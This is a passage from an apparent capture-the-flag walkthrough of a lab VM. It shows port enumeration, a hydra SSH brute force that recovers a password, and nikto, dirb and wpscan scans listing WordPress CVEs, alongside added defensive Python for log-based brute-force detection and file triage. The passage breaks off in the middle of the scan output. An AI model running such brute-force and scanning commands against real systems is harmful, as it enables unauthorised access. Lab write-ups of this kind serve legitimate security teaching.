drwxr-xr-x 5 0 0 4096 Jun 06 2016 resolvconf
-rwxr-xr-x 1 0 0 268 Nov 10 2015 rmt
-rw-r--r-- 1 0 0 887 Oct 25 2014 rpc
-rw-r--r-- 1 0 0 1371 Jan 27 2016 rsyslog.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 rsyslog.d
drwxr-xr-x 3 0 0 4096 May 15 17:54 samba
-rw-r--r-- 1 0 0 3663 Jun 09 2015 screenrc
-rw-r--r-- 1 0 0 4038 Mar 29 2016 securetty
drwxr-xr-x 4 0 0 4096 Jun 03 2016 security
drwxr-xr-x 2 0 0 4096 Jun 03 2016 selinux
-rw-r--r-- 1 0 0 19605 Oct 25 2014 services
drwxr-xr-x 2 0 0 4096 Jun 03 2016 sgml
-rw-r----- 1 0 42 4518 Jun 05 2016 shadow
-rw------- 1 0 0 1873 Jun 03 2016 shadow-
-rw-r--r-- 1 0 0 125 Jun 03 2016 shells
drwxr-xr-x 2 0 0 4096 Jun 03 2016 skel
-rw-r--r-- 1 0 0 100 Nov 25 2015 sos.conf
drwxr-xr-x 2 0 0 4096 Jun 04 2016 ssh
drwxr-xr-x 4 0 0 4096 Jun 03 2016 ssl
-rw-r--r-- 1 0 0 644 Jun 04 2016 subgid
-rw------- 1 0 0 625 Jun 03 2016 subgid-
-rw-r--r-- 1 0 0 644 Jun 04 2016 subuid
-rw------- 1 0 0 625 Jun 03 2016 subuid-
-r--r----- 1 0 0 769 Jun 05 2016 sudoers
drwxr-xr-x 2 0 0 4096 Jun 03 2016 sudoers.d
-rw-r--r-- 1 0 0 2227 Jun 03 2016 sysctl.conf
drwxr-xr-x 2 0 0 4096 Jun 03 2016 sysctl.d
drwxr-xr-x 5 0 0 4096 Jun 03 2016 systemd
drwxr-xr-x 2 0 0 4096 Jun 03 2016 terminfo
-rw-r--r-- 1 0 0 14 Jun 03 2016 timezone
drwxr-xr-x 2 0 0 4096 Apr 12 2016 tmpfiles.d
-rw-r--r-- 1 0 0 1260 Mar 16 2016 ucf.conf
drwxr-xr-x 4 0 0 4096 Jun 03 2016 udev
drwxr-xr-x 3 0 0 4096 Jun 03 2016 ufw
drwxr-xr-x 2 0 0 4096 Jun 03 2016 update-motd.d
drwxr-xr-x 2 0 0 4096 Jun 03 2016 update-notifier
drwxr-xr-x 2 0 0 4096 Jun 03 2016 vim
drwxr-xr-x 3 0 0 4096 Jun 03 2016 vmware-tools
-rw-r--r-- 1 0 0 278 Jun 03 2016 vsftpd.banner
-rw-r--r-- 1 0 0 0 Jun 03 2016 vsftpd.chroot_list
-rw-r--r-- 1 0 0 5961 Jun 04 2016 vsftpd.conf
-rw-r--r-- 1 0 0 0 Jun 03 2016 vsftpd.user_list
lrwxrwxrwx 1 0 0 23 Jun 03 2016 vtrgb -> /etc/alternatives/vtrgb
-rw-r--r-- 1 0 0 4942 Jan 08 2016 wgetrc
drwxr-xr-x 3 0 0 4096 Jun 03 2016 xdg
drwxr-xr-x 2 0 0 4096 Jun 03 2016 xml
drwxr-xr-x 2 0 0 4096 Jun 03 2016 zsh
226 Directory send OK.
ftp> exit
221 Goodbye.
root@kali:~#

Port 22 – Enumerating SSH (OpenSSH 7.2p2)

Trying to access SSH, the login banner reveals a username, Barry. Apart from that we could not find anything interesting.

root@kali:~# ssh root@192.168.1.30
The authenticity of host '192.168.1.30 (192.168.1.30)' can't be established.
ECDSA key fingerprint is SHA256:WuY26BwbaoIOawwEIZRaZGve4JZFaRo7iSvLNoCwyfA.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.30' (ECDSA) to the list of known hosts.
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
root@192.168.1.30's password:

So let's brute-force the SSH credentials using hydra.

root@kali:~# hydra -L user_list.txt -P user_list.txt 192.168.1.30 ssh
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-05-15 15:54:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 729 login tries (l:27/p:27), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.30 login: SHayslett password: SHayslett
[STATUS] 274.00 tries/min, 274 tries in 00:01h, 455 to do in 00:02h, 16 active
[STATUS] 274.50 tries/min, 549 tries in 00:02h, 180 to do in 00:01h, 16 active
[STATUS] 243.00 tries/min, 729 tries in 00:03h, 1 to do in 00:01h, 16 active
[STATUS] 182.25 tries/min, 729 tries in 00:04h, 1 to do in 00:01h, 16 active
[STATUS] 145.80 tries/min, 729 tries in 00:05h, 1 to do in 00:01h, 16 active
[STATUS] 121.50 tries/min, 729 tries in 00:06h, 1 to do in 00:01h, 16 active
[STATUS] 104.14 tries/min, 729 tries in 00:07h, 1 to do in 00:01h, 16 active
[STATUS] 91.12 tries/min, 729 tries in 00:08h, 1 to do in 00:01h, 16 active
[STATUS] 81.00 tries/min, 729 tries in 00:09h, 1 to do in 00:01h, 16 active
[STATUS] 72.90 tries/min, 729 tries in 00:10h, 1 to do in 00:01h, 16 active
[STATUS] 66.27 tries/min, 729 tries in 00:11h, 1 to do in 00:01h, 16 active
[STATUS] 60.75 tries/min, 729 tries in 00:12h, 1 to do in 00:01h, 16 active
[STATUS] 56.08 tries/min, 729 tries in 00:13h, 1 to do in 00:01h, 16 active
[STATUS] 52.07 tries/min, 729 tries in 00:14h, 1 to do in 00:01h, 16 active
[STATUS] 48.60 tries/min, 729 tries in 00:15h, 1 to do in 00:01h, 16 active
[STATUS] 45.56 tries/min, 729 tries in 00:16h, 1 to do in 00:01h, 16 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
root@kali:~#

Now that we have credentials for SHayslett we can log in.

root@kali:~# ssh SHayslett@192.168.1.30
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
SHayslett@192.168.1.30's password:SHayslett
Welcome back!
SHayslett@red:~$ id
uid=1005(SHayslett) gid=1005(SHayslett) groups=1005(SHayslett)
SHayslett@red:~$
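The hydra run above is what the brute force looks like from the attacker's side; from the server's side it is a burst of sshd failures for many different logins from one source, followed by a success. The following is an added example (not part of the original walkthrough) that parses constructed auth.log lines in sshd's format and flags that pattern; the sample lines, the year 2017 and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the syslog format OpenSSH's sshd writes to auth.log.
# These are not real logs from the Stapler VM: the burst from 192.168.1.20
# models what a hydra run with the same list for -L and -P looks like
# server-side, and 192.168.1.40 models a user mistyping a password once.
SAMPLE_AUTH_LOG = """\
May 15 15:54:08 red sshd[2101]: Failed password for invalid user john from 192.168.1.20 port 50112 ssh2
May 15 15:54:08 red sshd[2102]: Failed password for invalid user elly from 192.168.1.20 port 50113 ssh2
May 15 15:54:09 red sshd[2103]: Failed password for barry from 192.168.1.20 port 50114 ssh2
May 15 15:54:09 red sshd[2104]: Failed password for invalid user peter from 192.168.1.20 port 50115 ssh2
May 15 15:54:10 red sshd[2105]: Failed password for SHayslett from 192.168.1.20 port 50116 ssh2
May 15 15:54:10 red sshd[2106]: Failed password for invalid user tim from 192.168.1.20 port 50117 ssh2
May 15 15:54:11 red sshd[2107]: Accepted password for SHayslett from 192.168.1.20 port 50118 ssh2
May 15 15:55:30 red sshd[2110]: Failed password for barry from 192.168.1.40 port 41000 ssh2
May 15 15:55:45 red sshd[2111]: Accepted password for barry from 192.168.1.40 port 41001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?P<invalid>invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)


def parse_auth_log(text, year=2017):
    """Turn sshd password-auth lines into event dicts; other lines are skipped.
    syslog timestamps carry no year, so the caller supplies it."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({
            "ts": ts,
            "ip": m["ip"],
            "user": m["user"],
            "invalid_user": m["invalid"] is not None,
            "ok": m["result"] == "Accepted",
        })
    return events


def detect_bruteforce(events, window=timedelta(minutes=5), min_failures=5, min_users=3):
    """Flag each source IP whose densest run of failures inside `window` reaches
    min_failures across at least min_users distinct logins (a spray, not one
    user fat-fingering a password). Any success from that IP at or after the
    burst started is reported too: that is the hydra hit a responder cares about."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if not e["ok"]]
        best, start = [], 0
        for end in range(len(fails)):          # sliding window over failures
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            if end - start + 1 > len(best):
                best = fails[start:end + 1]
        users = {e["user"] for e in best}
        if len(best) < min_failures or len(users) < min_users:
            continue
        findings[ip] = {
            "failures": len(best),
            "distinct_users": len(users),
            "unknown_users": sum(e["invalid_user"] for e in best),
            "first": best[0]["ts"],
            "last": best[-1]["ts"],
            "success_after": [e["user"] for e in evs if e["ok"] and e["ts"] >= best[0]["ts"]],
        }
    return findings


if __name__ == "__main__":
    for ip, f in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(f"{ip}: {f['failures']} failures, {f['distinct_users']} users "
              f"({f['unknown_users']} nonexistent) between {f['first']:%H:%M:%S} and "
              f"{f['last']:%H:%M:%S}; successes after: {f['success_after'] or 'none'}")
```

The "invalid user" count is the cheap tell for a list-driven attack: a legitimate user rarely fails against accounts that do not exist.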

From here you could follow along with any of the three privilege escalation methods detailed in the latter half of the post. But for now let's move on with the enumeration phase.

Port 80 – Enumerating http
Let's run nikto and see what it discovers.

root@kali:~# nikto -h http://192.168.1.30/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.30
+ Target Hostname: 192.168.1.30
+ Target Port: 80
+ Start Time: 2017-05-14 21:53:46 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time: 2017-05-14 21:54:08 (GMT-4) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~#

Let's run dirb.

root@kali:~# dirb http://192.168.1.30/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun May 14 22:07:13 2017
URL_BASE: http://192.168.1.30/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.30/ ----
+ http://192.168.1.30/.bashrc (CODE:200|SIZE:3771)
+ http://192.168.1.30/.profile (CODE:200|SIZE:675)
-----------------
END_TIME: Sun May 14 22:07:17 2017
DOWNLOADED: 4612 - FOUND: 2
root@kali:~# wget http://192.168.1.30/.bashrc
--2017-05-14 22:08:54-- http://192.168.1.30/.bashrc
Connecting to 192.168.1.30:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3771 (3.7K) [application/octet-stream]
Saving to: ‘.bashrc.1’
.bashrc.1 100%[================================>] 3.68K --.-KB/s in 0s
2017-05-14 22:08:54 (417 MB/s) - ‘.bashrc.1’ saved [3771/3771]
root@kali:~# wget http://192.168.1.30/.profile
--2017-05-14 22:09:01-- http://192.168.1.30/.profile
Connecting to 192.168.1.30:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 675 [application/octet-stream]
Saving to: ‘.profile.1’
.profile.1 100%[================================>] 675 --.-KB/s in 0s
2017-05-14 22:09:01 (112 MB/s) - ‘.profile.1’ saved [675/675]
root@kali:~# ls -la .*.1
-rw-r--r-- 1 root root 3771 May 14 22:08 .bashrc.1
-rw-r--r-- 1 root root 675 May 14 22:09 .profile.1
root@kali:~#

Neither nikto nor dirb found anything that we could use. Accessing the page in the browser gives us nothing interesting either.

Let's move on to the next port.

Port 666 — Enumerating using nc

root@kali:~# nc 192.168.1.30 666
Pd��Hp���,2
message2.jpgUT +�QWJ�QWux
<snip>
root@kali:~# nc 192.168.1.30 666 > pic.jpeg
root@kali:~# file pic.jpeg
pic.jpeg: Zip archive data, at least v2.0 to extract
root@kali:~# unzip pic.jpeg
Archive: pic.jpeg
inflating: message2.jpg
root@kali:~# strings message2.jpg
JFIF
vPhotoshop 3.0
8BIM
1If you are reading this, you should get a cookie!
8BIM
root@kali:~#
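The port 666 blob was saved as pic.jpeg but `file` identified it as a ZIP, and the interesting string lived inside the JPEG it contained. The following added example (not code from the original walkthrough) does the same triage offline: sniff the container by magic bytes, walk the ZIP local file headers to list members, and read the JPEG's comment segments instead of relying on `strings`. The archive is constructed in memory as a stand-in; the real message2.jpg kept its text in Photoshop metadata, whereas this sample uses a plain COM segment.

```python
import io
import struct
import zipfile

MESSAGE = b"If you are reading this, you should get a cookie!"


def build_jpeg_with_comment(text):
    """Constructed minimal JPEG: SOI, one COM segment carrying `text`, EOI.
    The real message2.jpg kept its text in Photoshop (8BIM) metadata; a COM
    segment is used here because it is the simplest segment to build by hand."""
    com = b"\xff\xfe" + struct.pack(">H", len(text) + 2) + text
    return b"\xff\xd8" + com + b"\xff\xd9"


def build_sample_blob():
    """Constructed stand-in for the bytes port 666 served: a ZIP whose only
    member is message2.jpg. Not the real archive from the VM."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("message2.jpg", build_jpeg_with_comment(MESSAGE))
    return buf.getvalue()


# Magic-number table for the few types that matter here; `file` uses a far
# larger one, but the principle (trust the bytes, not the name) is the same.
MAGIC = (
    (b"PK\x03\x04", "zip"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\x7fELF", "elf"),
)


def sniff(data):
    for sig, name in MAGIC:
        if data.startswith(sig):
            return name
    return "unknown"


def list_zip_entries(data):
    """Walk the ZIP local file headers directly rather than the central
    directory at the end, so member names still come out of a capture that
    was cut short (the nc transfer on the page gave no length up front).
    Assumes sizes are present in the local header, i.e. no data descriptor."""
    entries, off = [], 0
    while True:
        off = data.find(b"PK\x03\x04", off)
        if off < 0 or off + 30 > len(data):
            break
        (_sig, _ver, flags, method, _mt, _md, crc, csize, usize,
         nlen, xlen) = struct.unpack("<IHHHHHIIIHH", data[off:off + 30])
        name = data[off + 30:off + 30 + nlen].decode("utf-8", "replace")
        entries.append({"name": name, "method": method, "crc32": crc,
                        "compressed": csize, "uncompressed": usize,
                        "data_descriptor": bool(flags & 0x08)})
        off += 30 + nlen + xlen + csize
    return entries


def jpeg_comments(data):
    """Return the text of JPEG COM segments, stopping at SOS where the
    entropy-coded image data begins; this is what `strings` found by brute force."""
    out, i = [], 2  # skip the SOI marker
    while i + 4 <= len(data) and data[i] == 0xFF:
        marker = data[i + 1]
        if marker in (0xD9, 0xDA):  # EOI or SOS
            break
        length = struct.unpack(">H", data[i + 2:i + 4])[0]
        if marker == 0xFE:
            out.append(data[i + 4:i + 2 + length].decode("latin-1"))
        i += 2 + length
    return out


def analyse(blob):
    """Identify the outer container and, for a ZIP, each member's real type."""
    report = {"outer": sniff(blob), "members": []}
    if report["outer"] != "zip":
        return report
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for entry in list_zip_entries(blob):
            inner = zf.read(entry["name"])
            kind = sniff(inner)
            report["members"].append({
                "name": entry["name"], "type": kind,
                "comments": jpeg_comments(inner) if kind == "jpeg" else [],
            })
    return report


if __name__ == "__main__":
    print(analyse(build_sample_blob()))
```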

Port 12380 — Enumerate http Apache httpd 2.4.18
There is an Apache server running on a non-standard port. Let's open it up in the browser.

Let's run amap.

root@kali:~# amap 192.168.1.30 12380
amap v5.4 (www.thc.org/thc-amap) started at 2017-05-15 15:08:12 - APPLICATION MAPPING mode
Protocol on 192.168.1.30:12380/tcp matches http
Protocol on 192.168.1.30:12380/tcp matches http-apache-2
Protocol on 192.168.1.30:12380/tcp matches ntp
Protocol on 192.168.1.30:12380/tcp matches ssl
Unidentified ports: none.
amap v5.4 finished at 2017-05-15 15:08:18
root@kali:~#

Let's run dirb.

root@kali:~# dirb http://192.168.1.30:12380/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun May 14 22:17:19 2017
URL_BASE: http://192.168.1.30:12380/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.30:12380/ ----

-----------------
END_TIME: Sun May 14 22:18:56 2017
DOWNLOADED: 4612 - FOUND: 0
root@kali:~#

Nothing interesting was found here either. Let's run nikto.

root@kali:~# nikto -h http://192.168.1.30:12380/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.30
+ Target Hostname: 192.168.1.30
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time: 2017-05-14 22:22:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.1.30' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2017-05-14 22:24:38 (GMT-4) (147 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.18) are not in
the Nikto database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)? n
root@kali:~#

Finally we found three interesting directories {/admin112233/, /blogblog/, /phpmyadmin/} and a robots.txt file. But trying to access any of the directories or the file just redirected us to the home page. After many futile attempts I looked back at the nikto output, which stated “The site uses SSL”.

Opening https://192.168.1.30:12380/admin112233/ was definitely not welcoming. Moving on to https://192.168.1.30:12380/blogblog/, we finally have something juicy to work with. Let's run wpscan to enumerate users and all plugins.

root@kali:~# wpscan --url https://192.168.1.30:12380/blogblog/ --enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: https://192.168.1.30:12380/blogblog/
[+] Started: Sun May 14 22:42:54 2017
[!] The WordPress 'https://192.168.1.30:12380/blogblog/readme.html' file exists exposing a version number
[+] Interesting header: DAVE: Soemthing doesn't look right here
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[!] Registration is enabled: https://192.168.1.30:12380/blogblog/wp-login.php?action=register
[+] XML-RPC Interface available under: https://192.168.1.30:12380/blogblog/xmlrpc.php
[!] Upload directory has directory listing enabled: https://192.168.1.30:12380/blogblog/wp-content/uploads/
[!] Includes directory has directory listing enabled: https://192.168.1.30:12380/blogblog/wp-includes/
[+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27)
[!] 35 vulnerabilities identified from the version number
[!] Title: WordPress 4.1-4.2.1 - Genericons Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7979
Reference: https://codex.wordpress.org/Version_4.2.2
[i] Fixed in: 4.2.2
[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8111
Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
Reference: https://twitter.com/klikkioy/status/624264122570526720
Reference: https://klikki.fi/adv/wordpress3.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5622
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5623
[i] Fixed in: 4.2.3
[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8126
Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2213
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
Reference: https://wpvulndb.com/vulnerabilities/8130
Reference: https://core.trac.wordpress.org/changeset/33536
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5730
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8131
Reference: https://core.trac.wordpress.org/changeset/33529
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5732
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8132
Reference: https://core.trac.wordpress.org/changeset/33541
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5733
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8133
Reference: https://core.trac.wordpress.org/changeset/33549
Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5734
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8186
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5714
[i] Fixed in: 4.2.5
[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8187
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7989
[i] Fixed in: 4.2.5
[!] Title: WordPress <= 4.3 - Publish Post & Mark as Sticky Permission Issue
Reference: https://wpvulndb.com/vulnerabilities/8188
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5715
[i] Fixed in: 4.2.5
[!] Title: WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8358
Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1564
[i] Fixed in: 4.2.6
[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
Reference: https://wpvulndb.com/vulnerabilities/8376
Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/36435
Reference: https://hackerone.com/reports/110801
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2222
[i] Fixed in: 4.2.7
[!] Title: WordPress 3.7-4.4.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8377
Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/36444
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2221
[i] Fixed in: 4.2.7
[!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
Reference: https://wpvulndb.com/vulnerabilities/8473
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029
[i] Fixed in: 4.5
[!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
Reference: https://wpvulndb.com/vulnerabilities/8474
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://github.com/WordPress/WordPress/commit/cb2b3ed3c7d68f6505bfb5c90257e6aaa3e5fcb9
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6634
[i] Fixed in: 4.5
[!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF
Reference: https://wpvulndb.com/vulnerabilities/8475
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6635
[i] Fixed in: 4.5
[!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8488
Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
[i] Fixed in: 4.5.2
[!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
Reference: https://wpvulndb.com/vulnerabilities/8489
Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
Reference: http://avlidienbrunn.com/wp_some_loader.php
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
[i] Fixed in: 4.2.8
[!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
Reference: https://wpvulndb.com/vulnerabilities/8518
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
[i] Fixed in: 4.2.9
[!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
Reference: https://wpvulndb.com/vulnerabilities/8519
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
[i] Fixed in: 4.2.9
[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
Reference: https://wpvulndb.com/vulnerabilities/8520
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
